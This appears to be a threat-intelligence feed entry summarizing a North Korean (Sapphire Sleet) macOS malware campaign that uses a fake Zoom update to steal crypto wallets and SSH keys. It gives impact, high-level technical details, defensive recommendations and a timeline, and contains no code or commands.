Back

North Korean Hackers Target macOS Users in Cryptocurrency Theft Campaign

Severity: High (Score: 75.5)

Sources: Gbhackers, Cybernews

Published: 2026-06-03 · Updated: 2026-06-03

Keywords: north, korean, macos, campaign, malware, uncovered, threat

Severity indicators: apt, north korean apt, malware

Summary

A sophisticated malware campaign targeting macOS users has been linked to North Korean threat group Sapphire Sleet. This operation focuses on cryptocurrency organizations, venture capital firms, and Web3 developers. Attackers use social engineering tactics to convince victims to download malware disguised as a legitimate Zoom update. Once installed, the malware executes a multi-stage infection chain, leveraging trusted macOS components to evade security measures. It collects sensitive information, including cryptocurrency wallets and SSH keys, and sends it to North Korean-controlled servers. The campaign signifies a shift towards trust abuse rather than traditional exploitation methods. Security researchers from LevelBlue's SpiderLabs attribute this activity to Sapphire Sleet based on familiar tactics and techniques. The campaign is ongoing, with significant implications for affected sectors. Key Points: • North Korean group Sapphire Sleet targets macOS users in a new malware campaign. • Attackers use social engineering to distribute malware disguised as a Zoom update. • The malware collects sensitive data, including cryptocurrency wallets and SSH keys.

Detailed Analysis

**Impact** The campaign targets macOS users within cryptocurrency organizations, venture capital firms, and Web3 developers. The attackers aim to steal cryptocurrency wallets, local browser extension data, Telegram session information, SSH keys, and unencrypted Apple Notes. The operation affects high-value financial and crypto sectors, with data exfiltrated to North Korean-controlled servers, potentially resulting in significant financial losses and operational disruption. **Technical Details** The attack uses social engineering to deliver malware disguised as a Zoom SDK update via Telegram, email, or professional platforms. The malware employs AppleScript and abuses native macOS applications like Finder and Apple Script Editor to bypass security prompts and gain persistence. No CVEs are exploited; instead, the campaign relies on trust abuse and multi-stage payload downloads from command-and-control servers. Indicators of compromise include the fake application systemupdate.app and communication with known North Korean C2 infrastructure. **Recommended Response** Defenders should educate users to verify software updates independently and be cautious of unsolicited communications requesting installation of updates. Deploy detections for suspicious AppleScript executions and monitor for unusual Finder activity and network connections to known C2 domains. Harden macOS security configurations to restrict script execution and enforce multi-factor authentication for sensitive accounts. Monitor for exfiltration attempts involving cryptocurrency wallets and SSH keys.

Source articles (2)

  • North Korean hackers target macOS users with advanced malware campaign — Cybernews · 2026-06-01
    Security researchers have uncovered a sophisticated macOS-focused malware campaign linked to the North Korean threat group Sapphire Sleet, also known as BlueNoroff or UNC1069. According to LevelBlue’s…
  • North Korean APT Targets macOS to Steal Crypto Wallets and SSH Keys — Gbhackers · 2026-06-03
    A newly uncovered macOS intrusion campaign attributed to the North Korean state- threat group Sapphire Sleet, also known as BlueNoroff or UNC1069, is targeting high-value organizations in the financia…

Timeline

  • 2026-06-01 — Malware campaign revealed: LevelBlue's SpiderLabs reported a sophisticated macOS malware campaign linked to Sapphire Sleet targeting cryptocurrency organizations.
  • 2026-06-03 — Ongoing threat confirmed: Gbhackers reported that the North Korean APT continues to target high-value organizations in the financial sector.

Related entities

  • BlueNoroff (Apt Group)
  • Sapphire Sleet (Apt Group)
  • UNC1069 (Apt Group)
  • Malware (Attack Type)
  • Phishing (Attack Type)
  • systemupdate.app (Domain)
  • Financial (Industry)
  • T1041 - Exfiltration Over C2 Channel (Mitre Attack)
  • T1059.005 - Visual Basic (Mitre Attack)
  • T1071 - Application Layer Protocol (Mitre Attack)
  • MacOS (Platform)
  • AppleScript Editor (Tool)
  • Finder (Tool)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed